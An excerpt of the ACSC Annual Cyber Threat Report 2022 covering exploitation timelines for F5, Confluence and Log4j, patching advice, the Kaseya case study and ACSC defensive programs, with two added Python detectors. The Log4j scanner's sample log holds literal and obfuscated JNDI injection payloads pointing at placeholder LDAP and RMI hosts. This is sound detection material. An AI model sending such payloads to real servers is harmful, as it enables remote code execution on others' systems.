6–7 May 2022: Just days after the vulnerability was disclosed, researchers published exploits, with malicious actors soon using
them in attacks across the internet.

Exploits which required just 2 commands and some headers became publicly known. The vulnerability was so easy to exploit
that some security researchers speculated that it did not end up in the products by accident.

9 May 2022: The ACSC published an Advisory addressing multiple vulnerabilities in the F5 BIG-IP Product Range.

10 May 2022: Security researchers tweeted that “real world devices are being erased”. The ACSC received its first reported
Australian incidents relating to exploitation of F5.

3 days from proof of concept until reported exploitation.

Key takeaway

In an environment where multiple vulnerabilities are disclosed, rapid patching is not enough. Organisations must
also monitor for indicators of compromise.

Confluence

What is Confluence? A web-based database tool for team collaboration, developed by Australian technology company Atlassian.

25 August 2021: Atlassian publicly announced a vulnerability (CVE-2021-26084) in certain versions of Atlassian Confluence and
released software version updates the same day.

31 August 2021: A Proof of Concept for the exploit was published online; first public reports of exploitation occurred the
same day.

1 September 2021: A CHIPs scan detected malicious actors scanning for, and attempting to exploit, this vulnerability on
Australian networks. The ACSC published an Advisory the same day.

1 day from proof of concept until reported exploitation.

Key takeaway

Over two-thirds of the cyber security incidents the ACSC responded to relating to this vulnerability occurred in the
first 6 days following the Proof of Concept, underscoring how new vulnerabilities are being rapidly exploited by
malicious actors.

The scalability and low cost of automated cyber exploitation techniques mean the driver for this type of compromise is
likely to be the existence of vulnerabilities in victim organisations, rather than an adversary’s interest in a particular
network. This ability of a wide array of cyber threat actors to compromise multiple networks, and then assess the value of
those accesses, will make it more difficult to attribute a specific motive for targeting an individual Australian network.


Log4j

The most prevalent critical vulnerability in the 2021–22 financial year was Log4j. Log4j is a popular software building block
found in a wide variety of Java applications. It provides logging functionality, recording the activity of the software in order
to diagnose problems. Over 100,000 products may contain Log4j—as Log4j is open source software, there is no definitive list.

The series of Log4j vulnerabilities made public in December 2021 was trivial to exploit. The vulnerability could be used to
execute code on the servers of the Minecraft video game by pasting messages into a chat box, for example.

In response to the Log4j vulnerabilities, the ACSC raised awareness, provided timely advice, and worked closely with
government, industry partners and impacted organisations to protect against exploitation of this vulnerability. Over
December 2021 – January 2022, the ACSC provided technical support to impacted organisations, released 2 critical Alerts
and 2 Advisories that were regularly updated, hosted 7 information sharing events through the ACSC Partnership Program,
and amplified advice on social media which had a potential reach of over one million people.

The ACSC is aware of malicious actors, including sophisticated cyber threat actors, conducting a large number of
reconnaissance scans for Log4j vulnerabilities. Some Australian networks were compromised through Log4j, and the ACSC
responded to over 50 cyber security incidents.

The ACSC has identified Log4j exploits being used months after the initial disclosure. Malicious actors also routinely scan
for vulnerabilities years after they are initially disclosed, targeting networks which are running legacy software or have failed
to patch. For instance, a 28 April 2022 Joint Five-Eyes Advisory observed that 6 of the top 15 Routinely Exploited
Vulnerabilities in 2021 were first disclosed in 2020 or earlier. Log4j is likely to be a means of access for malicious actors for
years to come.

Log4j timeline

24 November 2021: The cloud security team of Chinese company Alibaba privately reported the Log4j vulnerability to the
software developer.

10 December 2021: The vulnerability was publicly disclosed by cyber security researchers. The ACSC issued a public Alert
the same day and commenced a comprehensive suite of awareness and response initiatives to prevent potential compromises.

13 December 2021: The ACSC commenced technical incident response assistance to impacted organisations, and
commenced briefings of the National Cyber Security Committee, Australian Government Chief Information Officers and
industry partners.


What you should do


Patching and uplifting networks

In the face of increasingly rapid critical vulnerabilities, applying patches to applications and operating systems has become
even more essential. Once a security vulnerability in an internet-facing service is made public, it can be expected that
malicious code will be developed by adversaries within 48 hours. There are cases in which adversaries have developed
malicious code within hours of newly discovered security vulnerabilities. The ACSC therefore recommends patching
internet-facing services within 48 hours if an exploit exists. More detailed advice is available in the ACSC publication
Assessing Security Vulnerabilities and Applying Patches.

Some sectors of the Australian economy have lagged in their patching rates. A limited analysis of patching rates following
the 2021 Microsoft Exchange vulnerabilities, for instance, indicated that the Professional, Scientific and Technical Services
sector had the highest number of unpatched Microsoft Exchange servers overall, with a rate of unpatched servers
significantly higher than its share of the economy by number of businesses. This sector includes industries such as legal
and accounting services, which hold significant volumes of personal information on clients.

In addition to rapid patching, organisations need to monitor for Indicators of Compromise, as compromise may have already
occurred before the release or application of patches. This is especially so for zero-day exploits—vulnerabilities which have
been exploited before becoming publicly known. For instance, Log4j was first exploited at least 10 days before being
publicly disclosed.

It is vital that patching is comprehensive, and legacy assets are accounted for. Many organisations struggle to maintain an
accurate inventory of their ICT assets, and malicious actors know that the easiest path to a target network is often through
unknown or abandoned ICT assets. The ACSC recognises that some sectors have unique requirements, such as legacy
operational technology, and offers tailored uplift advice for such sectors.
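The Log4j discussion and the advice above to monitor for indicators of compromise both call for a concrete detector. The following Python script is an added example, not code from the ACSC report or from the Log4j project: it scans constructed web-server access-log lines for Log4j lookup strings, undoing the URL encoding and nested-lookup obfuscation that hide the trigger from naive string matching. All log lines and addresses are constructed sample data.

```python
"""Detect Log4j (Log4Shell-style) lookup strings in web server access logs.

Added example for the ACSC report's Log4j and patching sections; it is not
code from the report. The trigger for the Log4j lookup vulnerability is text an
attacker controls (a chat message, an HTTP header, a URL parameter) containing a
"${jndi:...}" lookup. Scanning probes hide the literal word "jndi" behind URL
encoding and nested lookups such as "${lower:j}" or "${::-j}", so a detector
has to normalise the line before matching. All log lines and addresses below
are constructed sample data (RFC 5737 documentation ranges).
"""
import re
import urllib.parse
from typing import Dict, List, Tuple

# "${lower:x}" / "${upper:x}" resolve to x; "${::-x}" and "${env:NAME:-x}"
# resolve to their default value x. Excluding "$", "{" and "}" from the body
# means each pattern only ever matches an innermost lookup, so repeated
# substitution unwraps nesting from the inside out.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}$]*)\}", re.IGNORECASE)
_DEFAULT_VALUE = re.compile(r"\$\{[^{}$]*?:-([^{}$]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Constructed sample access log (combined log format). Lines 2-4 carry lookup
# strings in the User-Agent, query string and Referer respectively; line 5 has
# a benign "${...}" placeholder that must not be flagged.
ACCESS_LOG = """\
203.0.113.10 - - [10/Dec/2021:14:02:11 +1000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.20 - - [10/Dec/2021:14:05:43 +1000] "GET /login HTTP/1.1" 200 1024 "-" "${jndi:ldap://198.51.100.7:1389/a}"
203.0.113.30 - - [11/Dec/2021:09:17:02 +1000] "GET /api/search?q=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F198.51.100.8%2Fx%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"
203.0.113.40 - - [11/Dec/2021:09:18:55 +1000] "POST /chat HTTP/1.1" 200 88 "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.9/o}" "Mozilla/5.0"
203.0.113.50 - - [11/Dec/2021:10:00:00 +1000] "GET /docs/${project.version} HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""


def normalise(text: str) -> str:
    """URL-decode, then unwrap nested lookups innermost-first until stable."""
    text = urllib.parse.unquote(text)
    previous = None
    while previous != text:
        previous = text
        text = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        text = _DEFAULT_VALUE.sub(lambda m: m.group(1), text)
    return text.lower()


def scan_line(line: str) -> Tuple[bool, str]:
    """Return (is_suspicious, normalised_line) for one raw log line."""
    norm = normalise(line)
    return _JNDI.search(norm) is not None, norm


def scan_log(text: str) -> List[Dict[str, object]]:
    """Scan a whole access log and return one finding per suspicious line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        hit, norm = scan_line(line)
        if not hit:
            continue
        match = _JNDI.search(norm)
        rest = norm[match.end():]
        # The scheme after "${jndi:" (ldap, rmi, dns, ...) tells the responder
        # what outbound connection the host would have attempted.
        protocol = rest.split("://", 1)[0].strip() if "://" in rest else "unknown"
        findings.append({"line": lineno, "client": line.split()[0], "protocol": protocol})
    return findings


if __name__ == "__main__":
    for finding in scan_log(ACCESS_LOG):
        print(f"line {finding['line']}: client {finding['client']} "
              f"sent a jndi:{finding['protocol']} lookup")
```

A hit means the string reached the server, not that exploitation succeeded; the responder still has to check whether the host made the corresponding outbound LDAP or RMI connection.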

Log4j timeline (continued)

14 December 2021: The ACSC published an updated Alert advising the ACSC had observed active exploitation of this
vulnerability within Australia.

15 December 2021: The ACSC published a public technical Advisory.

16–22 December 2021: The ACSC published additional Alerts and Advisories, and public webinars.

23 December 2021: The ACSC published an additional Alert, highlighting malicious actors using Log4j for ransomware activities.

Chapter 7

Cyber defence and resilience


■ Malicious actors are exploiting Australians’ desire for interconnected digital services.
■ Organisations can improve their cyber posture through implementing the Essential Eight.
■ Individuals should employ automatic updates and replace obsolete software and hardware.

Interconnectivity brings risks and opportunities

The virtualisation of Australian life that accelerated during the coronavirus pandemic has become entrenched. Remote
working arrangements have given way to a hybrid working model, further increasing cyber security risks as employees
switch regularly between personal and corporate devices.

For example, small office/home office (SOHO) modems, routers and network-attached storage are usually insecurely
designed with minimal security maintenance. SOHO routers are notorious for having insecure firmware, hardcoded
backdoors, and inconsistent patching. Even if secure patches are available, individual users are highly unlikely to install
them. And most SOHO routers manufactured before 2017 have no ability to automatically update firmware. Meanwhile,
the Internet of Things is growing by billions of devices each year and will introduce new types of vulnerabilities—for
instance, in April 2022, researchers released a proof of concept for compromising smart speakers by having the device
issue voice commands to itself.

The blurring of work and home lives has made the information held by individuals more valuable to malicious actors. Email
accounts listed in PII holdings will almost certainly be under increased threat of spear phishing activity. The theft of PII
creates a risk that ordinary Australians will be victimised and need substantial support. In some cases, a victim will be
impacted for the rest of their life as exposure of their personal information, once leaked or sold, cannot necessarily be
remediated.

As interconnectivity grows, malicious actors are increasingly looking to compromise multiple victims across a range of
sectors via a single entry point. The ACSC expects this trend to continue. For example, MSPs were targeted over 2021–22
as they are used by government, commercial and not-for-profit businesses of all sizes, making them an attractive target for
malicious actors. Malicious actors increasingly view the supply chain as a priority target and a vector for compromise.

ACSC Annual Cyber Threat Report 2022

Case Study: Kaseya supply chain ransomware attack


In July 2021, US ICT management provider Kaseya became the victim of a sophisticated ransomware cyberattack, which
exploited a vulnerability in remote management software. This allowed the ransomware affiliate to carry out a supply chain
compromise of Kaseya’s customers. The cybercriminal group responsible demanded USD 70 million in Bitcoin for a universal
decryption key that would unlock customer data.

Kaseya responded by advising on-premises customers to shut down affected servers, and subsequently released a
compromise detection tool and software patches to customers. The company also warned of spammers exploiting the
incident by sending phishing emails that had fake notifications with malicious links.

Due to Kaseya’s swift response, the attack was contained to fewer than 60 MSPs of its more than 37,000 customers
worldwide, and between 800 and 1500 downstream customers, including 3 affected MSPs in Australia.

From 4 to 5 July 2021, the ACSC responded to a small number of cyber security incidents involving Australian entities affected
by the Kaseya software compromise, including businesses in the Education, Health, and Professional, Scientific and
Technical Services sectors. The ACSC also published an Advisory on the Kaseya ransomware attack.

On 22 July 2021, Kaseya obtained a universal decryption key to unlock its files and those of its customers, which allowed Kaseya to restore functionality to all of its clients. Kaseya has stated publicly that it did not pay a ransom to the cybercrime affiliate responsible for the attack.

While interconnectivity introduces new risks, it also presents opportunities. Workplaces have become more resilient through remote working arrangements and greater use of cloud services, reducing the risk of single points of failure within in-house networks. Improved interconnectivity between government and industry is allowing real-time sharing of threat intelligence, enabling organisations such as financial institutions to better protect PII.


What is the ACSC doing?


The ACSC is delivering a range of initiatives that streamline—and where possible, automate—active cyber defence and
intelligence sharing. REDSPICE will further strengthen Australia’s cyber defences.

ACSC initiative: CTIS


The CTIS service enables the sharing of cyber threat intelligence at machine speed. Through the use of automation,
participating entities receive cyber threat intelligence in a structured and timely manner.

The CTIS Data Model enables partners to share cyber threat intelligence through a common language and outlines
standards to share data in alignment to the 5 Cs: Content, Context, Clarity, Communication and Confidence.

On 1 November 2021, the bi-directional CTIS platform went live.

On 19 November 2021, the ACSC facilitated the first successful bi-directional share between a commercial entity (National
Australia Bank - NAB) and a Government department. Cyber Threat Intelligence shared by members via CTIS is made
available to other members in order to support the identification of malicious cyber activity in their environments. In one
instance, intelligence shared by NAB provided the means to identify suspicious cyber activity in an environment that ACSC
previously had no visibility of.

■ 25,341 indicators have been provided by the ACSC, including from victims who are not ACSC Partners.
■ 741 have been provided by CTIS analysts working for ACSC’s delivery partner, Deloitte.
■ 2,261 have been shared with CTIS by ACSC Partners.

Following an early release to a sample-set of partners, CTIS was released broadly to ACSC network partners in June 2022.


ACSC initiative: Australian Protective Domain Name System


The Australian Protective Domain Name System (AUPDNS) is dedicated to protecting government networks. The system
uses verified threat intelligence to build a ‘block list’ of known malicious web domains.

Providing protection against malware, spyware, phishing attacks, viruses, and malicious sites, AUPDNS monitors
connections between an organisation’s network and the internet. AUPDNS also stops malware already on devices from
‘calling home’, mitigating the damage from an attack. The information captured within AUPDNS also helps build the ACSC’s
cyber threat picture.

In the 2021–22 financial year, AUPDNS processed more than 36 billion queries, and blocked over 24 million domain requests.
AUPDNS onboarded 171 organisations, including a number of state and local government agencies.
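One way to model the protective DNS check described above, as an added example that is not AUPDNS code: a block list built from threat-intelligence indicators is consulted for every query, subdomains of a listed domain are caught, and each refusal is recorded against the querying client so the blocked traffic can feed a threat picture. The indicators, client addresses and query log are constructed placeholders.

```python
"""Protective DNS policy check: an added illustration, not AUPDNS code.
A block list built from verified threat intelligence is consulted for every
query; hits are refused (so malware cannot 'call home') and counted to feed
a threat picture. All domains, clients and queries are constructed samples."""
from collections import defaultdict

def normalise(name):
    # Lower-case and strip the trailing dot so 'Evil.EXAMPLE.' == 'evil.example'.
    return name.strip().lower().rstrip(".")

def build_block_list(indicators):
    # Threat-intelligence domain indicators become a normalised lookup set.
    return {normalise(d) for d in indicators if d.strip()}

def is_blocked(qname, block_list):
    """Return the listed indicator matching qname or any parent domain, else None.
    A listed apex such as 'c2.example' also catches 'update.c2.example', but
    'notc2.example' is a different name and stays allowed."""
    labels = normalise(qname).split(".")
    for i in range(len(labels)):
        candidate = ".".join(labels[i:])
        if candidate in block_list:
            return candidate
    return None

def process_queries(queries, block_list):
    """Apply the policy to (client, qname) pairs.
    Returns (processed, blocked, picture): picture maps each matched indicator
    to the set of clients that tried to resolve it."""
    blocked = 0
    picture = defaultdict(set)
    for client, qname in queries:
        hit = is_blocked(qname, block_list)
        if hit is not None:
            blocked += 1
            picture[hit].add(client)
    return len(queries), blocked, dict(picture)

# Constructed sample indicators and query log (placeholder names, not real IoCs).
SAMPLE_INDICATORS = ["c2.example", "Phish-Login.Example.", "dropper.invalid"]
SAMPLE_QUERIES = [
    ("10.0.0.5", "www.example.com"),        # benign, allowed
    ("10.0.0.5", "update.c2.example."),     # subdomain of a listed apex, blocked
    ("10.0.0.9", "PHISH-LOGIN.example"),    # case differs, still blocked
    ("10.0.0.9", "cdn.dropper.invalid"),    # blocked
    ("10.0.0.12", "notc2.example"),         # not a subdomain of c2.example, allowed
]

if __name__ == "__main__":
    total, hits, picture = process_queries(SAMPLE_QUERIES, build_block_list(SAMPLE_INDICATORS))
    print(f"processed {total} queries, blocked {hits}; picture: {picture}")
```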

ACSC initiative: Domain Takedown Service


In response to the increasing threat posed by domains hosting malicious software, the ACSC launched the Domain
Takedown Service pilot in 2021.

Upon detecting suspected malicious software, the service verifies maliciousness before issuing a takedown notification
request to the relevant Domain Host. The service also operates 10 ‘honeypot’ servers on Australian IP ranges, giving the
ACSC the ability to directly report malicious domains for manual verification and takedown. The service only targets those
attack types which fall under ASD’s cyber security function as per the Intelligence Services Act 2001.

In 2021–22, the service focused on 4 lines of effort:

Line of effort                                        Number of notifications issued   Number of takedowns   Targeting success rate
Government (Australian, state & territory, local)     1,352                            1,333                 99%
Australian vaccine rollout                            16,291                           15,932                98%
Flubot text message malware                           19,117                           19,117                100%
Brute force attacks against Australian servers        29,446                           29,278                99%


Uplifting an interconnected Australian economy
Australia’s best defence in a rapidly evolving cyber threat environment is to build resilience across businesses and organisations, and among individuals. As vulnerabilities and interdependencies increase, preventative cyber security measures are not sufficient; organisations should also develop and test incident response, business continuity and disaster recovery plans. Commercial incident response providers have a particularly important role to play; they offer services to organisations which may have limited in-house capabilities, as well as reduce demand on the ACSC’s finite incident response capabilities. The ACSC is conducting a suite of incident response transformation activities to increase information sharing and reporting, while growing the scale and maturity of commercial providers and the cyber security sector as a whole.

The consequences for organisations which fail to manage cyber security incidents are clear. In May 2022, the Federal Court of Australia found that financial planning firm RI Advice had breached its financial services license obligations by having inadequate cybersecurity risk management systems. While the judgement does not set a legal standard for Australian Financial Services Licencees or other organisations, it is a strong reminder that company boards should consider cyber resilience as part of their statutory responsibilities. The ACSC publishes tailored advice for company boards, such as the January 2022 publication Log4j: What Boards and Directors Need to Know. The ACSC also directly engages senior executives through the Joint Cyber Security Centres.

Case Study: Qantas


Qantas and the ACSC have been sharing knowledge for over 12 years. In 2015, Qantas was part of the Prime Minister’s
Incident Response Taskforce and has participated in multiple other exercises. The ACSC and Qantas now have information
exchange agreements and dedicated liaison personnel.

Qantas regularly checks with the ACSC to verify intelligence gathered from other sources, seeks advice on new and unusual
cyber security challenges, and seeks feedback on its incident response processes.

The ACSC also learns from Qantas. Qantas shares insights with ACSC analysts on how threat information and leads are
gathered and managed in the private sector. The ACSC, Qantas and other aviation sector partners are also members of the
Australian Aviation Cyber Council.

During 2021–22, the benefits of the partnership were demonstrated during Qantas’s involvement in the Australian
Government’s distribution of COVID-19 vaccines. It was in the national interest to ensure that the vaccine distribution
process was not interrupted by a cyberattack, and Qantas and the ACSC worked closely to make sure Qantas’s cyber
protections were fit for the task.

Qantas Group Chief Information Security Officer Jeffrey Choi stated, “My team continues to benefit from sharing knowledge
and expertise with the ACSC, as well as through forums with industry peers. ACSC’s Advisories and threat intelligence have
given the Qantas Group greater visibility of the threat landscape in which we operate”.


What can my organisation do?

Essential Eight

The Australian Cyber Security Centre (ACSC) has developed prioritised mitigation strategies—in the form of the Strategies to Mitigate Cyber Security Incidents—to help organisations protect themselves against various cyber threats.

The Essential Eight Maturity Model, first published in June 2017 and updated regularly, supports the implementation of the Essential Eight. It is based on the ACSC’s experience in producing cyber threat intelligence, responding to cyber security incidents, conducting penetration testing and assisting organisations to implement the Essential Eight.

The Essential Eight remains highly relevant, with a major update released in July 2021. In recognition of the degrading cyber threat environment, in March 2022 the Attorney-General’s Department mandated the Essential Eight for all non-corporate Commonwealth entities through amendments to the Protective Security Policy Framework.

Become an ACSC Partner

The ACSC Partnership Program facilitates ACSC engagement with Australian organisations and individuals to lift cyber resilience across the Australian economy.

The ACSC Partnership Program comprises 3 tiers to reach the entire Australian economy:

■ Network Partners – for organisations with responsibility for their own ICT environments, experts in cyber security such as academics, and not-for-profit institutions. The community of ACSC Network Partners includes cyber security professionals across government, industry, and academia. Bringing together the situational awareness, technical expertise and experience of this community allows the collective public and private sectors to support and learn from each other. ACSC Network Partners are provided access to threat intelligence, news and advice to enhance situational awareness; collaboration opportunities with fellow cyber security professionals and resilience-building activities (such as exercises, discussions, workshops).

■ Business Partners – for businesses that would like to be kept up to date with relevant cyber security information for their businesses, including those not eligible for the Network Partner tier. This tier of partnership provides organisations with a better understanding of the cyber security landscape and outlines the steps required to protect themselves from cyber security threats. They receive a subscription to the ACSC Alert Service and a monthly newsletter containing news, publications and Advisories produced by the ACSC.

■ Home Partners – for individuals and families that would like to be kept up to date with relevant information. ACSC Home Partners receive a subscription to the ACSC Alert Service, providing them with a better understanding of the cyber security environment.

Joint Cyber Security Centres

The JCSCs support the Network Partner tier of the ACSC Partnership Program to bring together businesses and the research community, along with Australian, state and territory government agencies, in an open and cooperative environment. JCSCs in Adelaide, Brisbane, Melbourne, Perth, Sydney and Hobart, along with a virtual JCSC in Darwin, provide opportunities for the Australian cyber security community to come together in a trusted, neutral environment to drive collaboration and information-sharing.

Over the 2021–22 financial year, ACSC Network Partner membership has increased by 34 per cent, now comprising over 2,300 partners. Business Partners increased by 65 per cent to over 3400 and Home Partners by 8 per cent to over 82,000.


What can individuals do?


The risk of malicious cyber activity impacting Australian individuals remains high. The ACSC provides easy steps to secure your devices and accounts at cyber.gov.au, including step-by-step guides on how to enable multi-factor authentication (MFA) on popular social networking applications.

Individuals are encouraged to patch or mitigate critical vulnerabilities within 48 hours. Individuals should turn on automatic updates on all devices and apps, including personal mobile phones, computers and smart devices such as smart speakers. Individuals should be aware that many device manufacturers and software providers only support updates for a limited number of years, and older devices and software may have security vulnerabilities that cannot be patched.

Individuals should also activate MFA, backup devices, set secure passphrases and be alert for scams.

Individuals interested in becoming an ACSC Home Partner should register for the ACSC Alert Service.

■ Patch within 48 hours
■ Turn on automatic updates
■ Activate MFA, backup devices, set secure passphrases and be alert for scams

For advice, call the Australian Cyber Security Hotline 1300 CYBER1 (1300 292 371).

Notes

Sources
The ACSC manages or uses a number of unique datasets
to produce tailored advice and assistance for Australian
Government, organisations and the public. Data used
in this report have been extracted from live datasets of
cybercrime reports and cyber security incidents reported
to the ACSC. As such, the statistics and conclusions in this
report are based on point-in-time analysis and assessment.
Cybercrime and cyber security incidents reported to
the ACSC may not reflect all cyber threats and trends in
Australia’s cyber security environment.

The ACSC encourages the reporting of cyber security incidents and cybercrimes to inform ACSC advice and assistance to
vulnerable organisations, and enhance situational awareness of the national cyber threat environment.

Glossary
The ACSC glossary provides definitions for terms used in this
Report and other ACSC publications.

Feedback
The ACSC welcomes feedback to improve the services it
provides to Australians. Feedback can be provided via our
feedback form, by emailing [email protected] or
by calling 1300 CYBER1 (1300 292 371).
